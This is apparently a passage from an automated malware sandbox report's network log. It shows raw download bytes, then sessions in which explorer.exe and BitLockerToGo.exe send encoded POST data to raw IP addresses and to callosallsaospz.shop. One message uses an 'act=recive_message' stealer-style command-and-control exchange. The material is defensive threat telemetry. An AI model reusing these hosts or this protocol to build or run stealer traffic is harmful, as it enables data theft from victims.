PublicKeyToken=b77a5c561934e089Flags.System.Security.Permissions.PermissionSetAt
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea fe 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea Data Ascii: ffffffffffffffffffffffffffffffffffffffff
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 07 f0 01 ff 00 00 ff 83 80 01 c1 ff 00 00 ff 90 00 00 09 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff c0 00 00 03 ff 00 00 ff f0 00 00 0f ff 00 00 ff ff 00 00 ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 28 00 00 00 50 00 00 00 01 00 20 00 00 00 00 00 40 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ((P @
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: 59 b1 e8 ff 59 b1 e8 be 00 00 00 00 00 00 00 00 00 00 00 00 59 b1 e8 05 59 b1 e8 5f 59 b1 e8 ab 59 b1 e8 dc 59 b1 e8 f9 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 fa 59 b1 e8 de 59 b1 e8 af 59 b1 e8 65 59 b1 e8 08 00 00 00 00 00 00 00 00 e0 07 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 82 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 73 00 65 00 74 00 75 00 70 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: YYYY_YYYYYYYYYYeYsetups
2024-07-24 17:56:44 UTC	2744	IN	Data Raw: 45 89 9d d1 33 da 32 02 23 db 12 08 eb 9d 50 9c fa 75 86 2a bd c5 4d 00 ca 8b cb cd bb 22 e7 09 51 e4 8a 78 8b f8 bc fb 1f 87 c1 82 4d 7a dc b9 71 8b 5d 58 9e ee 40 fe 98 69 9b 56 fe 33 68 1e 9e fa a8 d7 ed ab f2 25 4b 1e b1 11 80 51 8c 50 71 1d 2a b6 7f 38 54 43 9a 01 6b 09 36 3a c6 76 8f 4c 0e 7f ba bb 02 a8 c2 b7 ab 7f f9 f6 e6 5a 3a c0 59 85 99 1a 3f d1 2e 39 6d a9 d1 4f 06 92 0a a9 d8 63 54 8c 5a 1a 0c d5 85 a1 3f c4 72 81 83 89 38 0d f1 59 90 16 09 f4 15 ae 3f dd d3 9b ea 5a 58 10 f0 5c 8e c5 83 76 a5 1a c6 e8 12 b5 8f 5a 5b f0 30 09 a9 78 95 23 78 a2 d9 63 6e 89 3c bb 7d 65 67 1e 4d 55 ae 23 2b a3 7a ba 9b e4 83 26 7a a2 c9 9b 98 85 ab f4 32 e1 83 c6 c8 f8 a8 97 0e 70 d6 4f 4e 78 ee 04 ae 64 b6 14 ab e4 d5 e8 ef c3 84 96 47 e4 b5 57 25 a7 92 d6 38 Data Ascii: E32#PuM"QxMzq]X@iV3h%KQPq8TCk6:vLZ:Y?.9mOcTZ?r8Y?ZX\vZ[0x#xcn<}egMU#+z&z2pONxdGW%8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49746	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:45 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1143
2024-07-24 17:56:45 UTC	1143	OUT	Data Raw: 6f 43 57 35 42 42 4d 75 47 4c 79 75 6b 43 72 50 35 4d 32 59 4a 51 4c 48 6e 70 37 79 6b 68 73 76 59 41 4d 62 72 68 4c 39 66 51 50 65 30 55 63 61 35 63 35 4e 61 7a 45 56 57 50 48 5a 54 6d 77 5a 55 2f 76 61 39 44 6b 78 53 53 2f 4e 50 65 4d 77 74 64 5a 55 67 6a 4f 63 46 52 71 39 51 46 67 4c 33 71 45 6a 53 33 43 37 6b 6f 67 56 42 4a 45 37 32 6c 77 56 44 73 5a 38 44 44 54 37 74 52 78 30 6d 62 53 59 43 64 56 61 5a 55 43 42 61 54 39 70 4a 74 4d 72 7a 43 4c 52 50 74 78 38 4c 46 59 6c 4b 47 57 38 4c 69 34 50 68 4e 68 77 2b 70 48 63 51 4b 6d 44 33 73 2f 7a 44 44 74 53 36 38 44 42 77 4f 6b 4c 64 62 4c 70 63 47 52 34 67 73 47 2b 64 70 6e 2f 30 6f 73 5a 64 51 59 54 78 33 6d 4c 47 42 36 72 37 6b 43 61 51 45 39 52 41 49 76 39 55 4b 73 58 76 33 6c 41 46 30 77 76 79 71 47 Data Ascii: oCW5BBMuGLyukCrP5M2YJQLHnp7ykhsvYAMbrhL9fQPe0Uca5c5NazEVWPHZTmwZU/va9DkxSS/NPeMwtdZUgjOcFRq9QFgL3qEjS3C7kogVBJE72lwVDsZ8DDT7tRx0mbSYCdVaZUCBaT9pJtMrzCLRPtx8LFYlKGW8Li4PhNhw+pHcQKmD3s/zDDtS68DBwOkLdbLpcGR4gsG+dpn/0osZdQYTx3mLGB6r7kCaQE9RAIv9UKsXv3lAF0wvyqG
2024-07-24 17:56:46 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:46 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:46 UTC	685	IN	Data Raw: 58 69 62 37 5a 39 72 6f 72 73 63 76 41 46 6d 73 44 6f 46 2f 68 4d 51 46 4b 44 42 57 37 67 41 46 55 44 47 4e 7a 51 53 6c 4b 76 52 34 54 78 42 42 34 30 49 6d 36 70 6b 46 37 37 68 48 67 59 67 4c 42 68 67 39 38 66 4c 56 31 66 4e 6c 63 34 78 61 37 39 63 43 39 53 70 2b 45 38 62 68 6f 6c 6a 4b 6b 75 75 4e 69 42 39 6c 45 4f 57 2f 53 72 55 4a 6f 45 52 32 78 4a 55 4b 4f 6c 35 6d 72 6e 53 42 76 75 71 49 42 41 54 4d 53 6d 64 6a 55 74 4e 36 72 74 71 78 43 49 58 7a 44 4b 71 6e 76 46 72 47 39 2b 4a 6e 57 75 51 34 4e 6b 46 71 56 74 71 46 70 49 64 6d 72 52 76 49 45 64 31 63 50 6b 32 6c 2f 7a 76 6e 75 65 4d 4b 48 50 31 43 6e 46 70 71 70 70 53 64 79 71 4d 4c 43 4c 53 34 70 35 69 69 58 43 66 71 79 38 73 32 53 33 50 2b 51 4d 45 74 47 75 62 79 71 64 6d 67 2f 51 66 70 56 51 57 Data Ascii: Xib7Z9rorscvAFmsDoF/hMQFKDBW7gAFUDGNzQSlKvR4TxBB40Im6pkF77hHgYgLBhg98fLV1fNlc4xa79cC9Sp+E8bholjKkuuNiB9lEOW/SrUJoER2xJUKOl5mrnSBvuqIBATMSmdjUtN6rtqxCIXzDKqnvFrG9+JnWuQ4NkFqVtqFpIdmrRvIEd1cPk2l/zvnueMKHP1CnFpqppSdyqMLCLS4p5iiXCfqy8s2S3P+QMEtGubyqdmg/QfpVQW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49750	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:47 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:56:47 UTC	1267	OUT	Data Raw: 56 36 45 58 65 78 49 72 56 55 59 68 76 65 46 68 50 33 35 45 65 6b 67 4f 2b 57 57 2f 54 6a 33 4d 53 71 68 4c 32 74 42 4a 41 72 37 69 75 77 33 47 41 4c 4f 41 65 4d 4f 30 48 42 32 6c 31 48 71 6c 7a 4e 30 39 59 63 79 35 77 62 64 32 76 4a 38 75 43 74 65 55 52 54 6f 4c 78 54 4b 42 59 77 69 51 39 6e 47 34 6e 48 6c 59 54 4e 51 32 51 64 38 79 43 6f 61 38 30 41 39 62 42 79 66 59 5a 61 6e 2f 58 47 43 63 76 55 6b 70 74 62 61 4c 48 33 31 7a 55 65 77 6b 34 36 4a 63 65 74 69 39 32 48 36 51 5a 2b 50 37 70 46 6c 74 49 34 64 2f 2b 55 58 59 54 39 58 72 67 36 30 2b 71 72 37 78 7a 68 4c 67 77 70 30 73 74 45 41 34 41 67 62 4c 69 49 54 67 7a 51 67 52 77 30 79 57 41 5a 46 53 49 41 36 32 59 46 38 4d 41 64 55 4b 6a 69 4d 68 5a 56 49 6f 72 6d 47 61 41 38 34 6d 68 37 5a 52 63 53 79 Data Ascii: V6EXexIrVUYhveFhP35EekgO+WW/Tj3MSqhL2tBJAr7iuw3GALOAeMO0HB2l1HqlzN09Ycy5wbd2vJ8uCteURToLxTKBYwiQ9nG4nHlYTNQ2Qd8yCoa80A9bByfYZan/XGCcvUkptbaLH31zUewk46Jceti92H6QZ+P7pFltI4d/+UXYT9Xrg60+qr7xzhLgwp0stEA4AgbLiITgzQgRw0yWAZFSIA62YF8MAdUKjiMhZVIormGaA84mh7ZRcSy
2024-07-24 17:56:48 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:48 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:48 UTC	685	IN	Data Raw: 45 36 54 56 74 58 46 64 47 71 2f 6a 67 6c 6d 70 47 58 47 64 51 4f 4a 6e 43 35 39 51 4c 6b 39 33 75 4a 41 50 4a 71 56 68 45 47 50 30 79 7a 55 47 72 7a 72 64 4b 35 5a 4b 37 45 64 46 6f 76 62 31 58 38 42 78 4c 68 36 38 62 38 46 61 39 70 4e 76 70 67 54 37 73 45 31 36 45 52 42 75 34 71 65 48 74 71 53 2f 41 6c 47 66 4d 63 51 55 77 36 50 6f 74 78 48 41 55 49 50 53 4a 66 30 39 52 41 31 56 4a 6d 64 6a 39 53 4e 33 61 4a 71 2f 6d 39 77 43 30 7a 49 78 4c 49 6f 5a 49 55 35 43 6b 42 6d 56 74 71 63 59 6b 77 41 43 30 54 4e 74 4e 48 35 77 68 4a 38 75 68 68 42 31 50 57 42 49 4d 53 69 6c 78 36 38 52 70 34 78 6b 75 48 6c 6f 41 39 58 77 75 4e 42 53 39 64 69 6d 52 6c 4a 35 6a 69 65 45 78 58 42 51 4c 37 51 69 71 44 46 32 55 41 79 4a 65 42 48 44 39 77 6a 41 45 4d 31 6c 36 35 4d Data Ascii: E6TVtXFdGq/jglmpGXGdQOJnC59QLk93uJAPJqVhEGP0yzUGrzrdK5ZK7EdFovb1X8BxLh68b8Fa9pNvpgT7sE16ERBu4qeHtqS/AlGfMcQUw6PotxHAUIPSJf09RA1VJmdj9SN3aJq/m9wC0zIxLIoZIU5CkBmVtqcYkwAC0TNtNH5whJ8uhhB1PWBIMSilx68Rp4xkuHloA9XwuNBS9dimRlJ5jieExXBQL7QiqDF2UAyJeBHD9wjAEM1l65M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49752	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:49 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:56:49 UTC	1267	OUT	Data Raw: 4c 69 6b 39 73 45 46 6e 31 53 55 55 66 77 71 44 71 31 6d 4b 4f 34 4c 4f 6e 4a 4c 69 50 54 38 78 37 73 64 74 35 32 50 70 55 71 57 49 59 73 51 6e 4c 42 56 71 52 51 6c 4f 73 63 4b 70 36 53 72 41 4a 4d 65 74 6a 42 53 56 50 53 55 45 69 54 4c 43 78 50 30 6b 4b 68 59 4f 42 39 6e 64 6f 79 6c 30 75 58 55 7a 34 33 66 65 42 36 75 30 35 6d 37 72 47 58 41 66 6f 41 58 36 71 2f 5a 45 6f 2b 6a 45 72 4b 51 33 74 4e 2b 49 59 54 62 47 39 63 49 68 35 37 50 67 70 66 75 76 54 43 39 34 63 41 58 79 4e 6f 64 58 4b 35 56 30 41 37 36 44 61 57 6d 72 45 49 45 48 67 54 61 66 70 30 74 55 77 43 61 35 31 5a 45 68 6a 33 58 6b 43 64 36 38 54 56 32 61 37 53 2b 68 6e 46 5a 39 6d 5a 4c 36 49 75 2f 4d 56 4f 62 57 59 78 51 6f 30 30 49 34 6f 36 47 6d 63 72 6c 76 62 76 57 63 63 66 73 50 43 44 73 Data Ascii: Lik9sEFn1SUUfwqDq1mKO4LOnJLiPT8x7sdt52PpUqWIYsQnLBVqRQlOscKp6SrAJMetjBSVPSUEiTLCxP0kKhYOB9ndoyl0uXUz43feB6u05m7rGXAfoAX6q/ZEo+jErKQ3tN+IYTbG9cIh57PgpfuvTC94cAXyNodXK5V0A76DaWmrEIEHgTafp0tUwCa51ZEhj3XkCd68TV2a7S+hnFZ9mZL6Iu/MVObWYxQo00I4o6GmcrlvbvWccfsPCDs
2024-07-24 17:56:50 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:50 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:50 UTC	685	IN	Data Raw: 68 6d 73 5a 75 66 38 69 75 62 55 77 51 53 4e 4e 31 4f 6f 56 5a 55 73 58 5a 4c 4f 56 76 31 52 77 72 6c 58 33 54 2f 67 54 58 31 57 56 75 30 59 38 77 66 4f 2b 2b 45 50 33 62 59 4d 49 70 7a 68 5a 67 4c 62 77 79 2f 65 58 75 68 59 61 68 78 63 4c 77 63 73 53 46 6e 50 69 47 34 31 45 6e 7a 43 4e 6b 6b 36 49 6c 31 50 52 61 43 69 4a 66 2f 51 5a 66 66 51 69 52 50 57 65 51 56 45 59 4a 38 6a 6a 71 49 46 70 72 57 4e 62 42 33 47 76 31 51 71 53 36 72 59 53 32 39 55 6a 6a 6c 73 55 4c 51 36 50 4e 6b 43 7a 31 64 75 58 31 6c 79 36 48 45 70 70 6f 75 34 35 47 70 44 70 34 2b 45 4b 43 65 47 53 68 4f 70 62 75 30 43 48 6d 35 6e 63 4b 37 4e 43 38 2f 2f 56 53 67 57 39 49 69 74 4b 4e 49 70 2f 4d 35 65 62 69 77 69 38 33 73 61 66 47 78 59 62 6d 38 79 59 6b 32 32 49 42 4c 2b 64 30 70 33 Data Ascii: hmsZuf8iubUwQSNN1OoVZUsXZLOVv1RwrlX3T/gTX1WVu0Y8wfO++EP3bYMIpzhZgLbwy/eXuhYahxcLwcsSFnPiG41EnzCNkk6Il1PRaCiJf/QZffQiRPWeQVEYJ8jjqIFprWNbB3Gv1QqS6rYS29UjjlsULQ6PNkCz1duX1ly6HEppou45GpDp4+EKCeGShOpbu0CHm5ncK7NC8//VSgW9IitKNIp/M5ebiwi83safGxYbm8yYk22IBL+d0p3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49753	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:50 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:56:50 UTC	1122	OUT	Data Raw: 4c 75 2f 55 56 62 78 4e 38 72 61 59 66 62 68 37 47 6d 6e 50 58 4d 6f 4c 30 38 37 69 54 68 77 4c 4b 72 39 56 76 4c 5a 78 6c 41 55 2b 48 57 66 4d 58 68 6e 2b 30 6b 78 66 36 33 66 77 37 61 77 4d 4c 41 37 2f 6f 57 6f 72 70 52 6a 49 6d 4e 6c 78 31 45 4f 77 2f 72 49 56 4a 6b 76 6c 39 75 64 43 4c 49 64 2f 54 31 32 56 58 6c 75 6a 51 6b 45 44 73 79 4e 58 72 58 77 2f 67 30 57 32 71 51 38 4a 43 46 64 31 48 43 6f 59 45 77 41 48 46 52 38 4a 6b 37 61 68 32 70 4b 53 61 48 61 2b 50 2f 52 30 5a 49 36 61 43 53 49 58 50 4f 66 34 35 42 53 36 68 37 2b 49 65 42 6c 4b 7a 63 6b 59 33 55 53 39 74 65 7a 34 49 31 63 49 43 71 58 5a 6d 4b 6e 59 35 64 70 4e 45 42 6b 43 34 59 41 38 67 30 4f 55 44 69 31 4a 37 71 6b 4f 6a 6e 72 6b 77 51 75 67 59 6c 36 78 32 50 57 79 52 79 65 53 4d 38 59 Data Ascii: Lu/UVbxN8raYfbh7GmnPXMoL087iThwLKr9VvLZxlAU+HWfMXhn+0kxf63fw7awMLA7/oWorpRjImNlx1EOw/rIVJkvl9udCLId/T12VXlujQkEDsyNXrXw/g0W2qQ8JCFd1HCoYEwAHFR8Jk7ah2pKSaHa+P/R0ZI6aCSIXPOf45BS6h7+IeBlKzckY3US9tez4I1cICqXZmKnY5dpNEBkC4YA8g0OUDi1J7qkOjnrkwQugYl6x2PWyRyeSM8Y
2024-07-24 17:56:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:52 UTC	685	IN	Data Raw: 64 64 6d 74 6f 76 51 47 4d 41 54 74 66 77 79 32 77 4c 61 4d 59 4a 72 2f 62 34 67 65 42 4e 4b 6b 30 57 34 51 75 70 6f 68 63 62 4f 52 49 33 72 5a 79 70 37 4d 38 67 75 38 52 49 6b 59 51 6c 75 41 51 73 44 72 6e 34 52 63 68 34 50 6c 2b 58 75 72 54 74 48 70 48 59 42 76 38 61 73 74 30 6e 6d 64 6d 73 34 45 63 43 71 6d 6b 76 42 6b 6c 4a 41 34 53 6c 4f 2b 56 6b 33 41 75 41 65 55 49 32 4d 6b 56 42 72 67 33 6b 31 6a 73 64 41 57 78 72 7a 59 62 4d 36 70 69 56 47 46 6d 46 6e 2f 6e 37 2f 2b 36 58 62 4a 2b 56 4c 37 38 41 69 4b 72 71 7a 52 35 76 48 49 69 44 53 43 54 70 6b 67 43 72 59 73 78 61 31 34 4a 4f 51 61 2f 52 46 4b 37 38 44 34 68 43 55 50 35 57 50 65 45 49 71 6d 4b 61 54 69 56 30 75 6d 31 66 56 43 64 4e 64 4f 42 71 39 38 30 59 6a 56 69 49 36 6c 67 5a 33 67 42 2b 79 Data Ascii: ddmtovQGMATtfwy2wLaMYJr/b4geBNKk0W4QupohcbORI3rZyp7M8gu8RIkYQluAQsDrn4Rch4Pl+XurTtHpHYBv8ast0nmdms4EcCqmkvBklJA4SlO+Vk3AuAeUI2MkVBrg3k1jsdAWxrzYbM6piVGFmFn/n7/+6XbJ+VL78AiKrqzR5vHIiDSCTpkgCrYsxa14JOQa/RFK78D4hCUP5WPeEIqmKaTiV0um1fVCdNdOBq980YjViI6lgZ3gB+y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49754	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:51 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: callosallsaospz.shop
2024-07-24 17:56:51 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-24 17:56:51 UTC	818	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0fsfcendtf04i24j93hvqkvjfg; expires=Sun, 17-Nov-2024 11:43:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAD6l8zl06I%2FjfVVu%2Fzn1w6%2BqD4Duiv26bU2nHuLNd7%2FPA1Nd%2B2hszgaKbkuQ%2FMECEHil8SDMqtvSaMLpaRSeaVnZCiSSCECQm388%2BnDIs%2Bk8IStGGG8hb2SQbNpR9cIiCnjksVaBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca0becb14407-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:56:51 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-24 17:56:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49756	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:52 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: callosallsaospz.shop
2024-07-24 17:56:52 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
2024-07-24 17:56:52 UTC	822	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ogvo837pbpp1li85v3c6pihqoj; expires=Sun, 17-Nov-2024 11:43:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5UMUNFwZTTA5V2nB%2FULhKVTMH%2BibJn%2F1TES%2BrCEbutR0uuNWgor1UmwAPXD%2Bhq%2Bs6%2B%2FsShWDoPSIkP8Aev6SRwjk%2Fzfe4DJdclgOOwizgg9wFk60Px93yKLSkvS6Bx15l%2B6gNZGxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca137e8e72bc-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:56:52 UTC	547	IN	Data Raw: 31 64 62 32 0d 0a 50 45 57 73 61 71 58 35 7a 67 2f 38 2b 6f 37 49 69 79 4e 70 66 52 76 57 50 6b 35 30 58 45 6f 6d 4a 66 41 49 6f 6a 33 41 35 6d 46 48 5a 39 70 49 6e 38 33 69 4c 59 2b 66 72 50 4c 2f 55 52 77 59 4e 2f 52 66 4b 6c 5a 6d 4c 45 64 4a 67 32 32 4f 48 37 61 4c 51 77 59 6a 7a 51 62 57 6e 4f 49 74 6d 59 4b 73 38 74 42 59 53 78 68 31 39 41 52 73 45 54 59 6f 52 30 6d 53 61 63 6c 53 73 49 6f 43 56 43 6e 4c 41 73 43 61 71 6d 36 51 6c 2b 75 74 37 6b 49 44 45 33 4b 37 56 69 4e 57 63 47 68 44 58 39 49 79 67 48 43 6c 6b 67 42 78 4a 4e 38 42 68 34 54 69 64 4e 36 66 34 4f 71 78 41 51 67 59 65 62 70 59 4b 68 38 30 49 6b 35 42 6b 32 7a 49 54 61 6d 41 43 56 51 6e 79 41 50 4b 6b 37 35 6a 6d 70 44 67 71 2b 52 43 53 31 45 35 73 30 52 73 54 6e 35 37 64 6b 53 44 65 Data Ascii: 1db2PEWsaqX5zg/8+o7IiyNpfRvWPk50XEomJfAIoj3A5mFHZ9pIn83iLY+frPL/URwYN/RfKlZmLEdJg22OH7aLQwYjzQbWnOItmYKs8tBYSxh19ARsETYoR0mSaclSsIoCVCnLAsCaqm6Ql+ut7kIDE3K7ViNWcGhDX9IygHClkgBxJN8Bh4TidN6f4OqxAQgYebpYKh80Ik5Bk2zITamACVQnyAPKk75jmpDgq+RCS1E5s0RsTn57dkSDe
2024-07-24 17:56:52 UTC	1369	IN	Data Raw: 6d 59 45 51 49 6f 71 6d 42 2b 4d 67 77 42 4d 5a 66 73 4c 79 5a 57 72 65 39 36 48 6f 72 4f 70 52 67 64 66 49 66 52 53 4b 52 6b 73 4b 56 5a 43 6e 48 6a 4d 57 71 53 4a 41 46 41 6e 79 77 2f 4b 6c 61 70 71 6e 5a 44 6f 71 2b 64 4e 41 52 78 39 74 78 78 69 56 6a 6b 77 42 42 2f 53 57 38 4e 62 70 5a 59 41 55 47 66 52 52 74 37 62 71 32 48 65 77 4b 79 67 37 30 77 43 46 48 36 38 55 44 34 64 4d 53 74 4e 51 4a 52 67 77 31 65 6f 67 67 31 66 49 4d 73 50 31 5a 57 6e 59 4a 32 53 36 75 71 6e 41 51 77 48 4f 65 77 63 41 68 55 76 50 6e 5a 45 67 33 75 41 51 4f 79 64 51 31 6b 72 6a 6c 43 48 6b 71 52 69 6b 35 58 6d 70 4f 78 4d 41 68 35 34 75 56 6f 6e 46 7a 59 67 51 45 43 53 62 73 31 51 72 49 51 4e 56 69 4c 4b 41 73 37 62 34 69 32 5a 67 4b 7a 79 71 58 45 47 45 33 4b 34 48 68 6b 56 Data Ascii: mYEQIoqmB+MgwBMZfsLyZWre96HorOpRgdfIfRSKRksKVZCnHjMWqSJAFAnyw/KlapqnZDoq+dNARx9txxiVjkwBB/SW8NbpZYAUGfRRt7bq2HewKyg70wCFH68UD4dMStNQJRgw1eogg1fIMsP1ZWnYJ2S6uqnAQwHOewcAhUvPnZEg3uAQOydQ1krjlCHkqRik5XmpOxMAh54uVonFzYgQECSbs1QrIQNViLKAs7b4i2ZgKzyqXEGE3K4HhkV
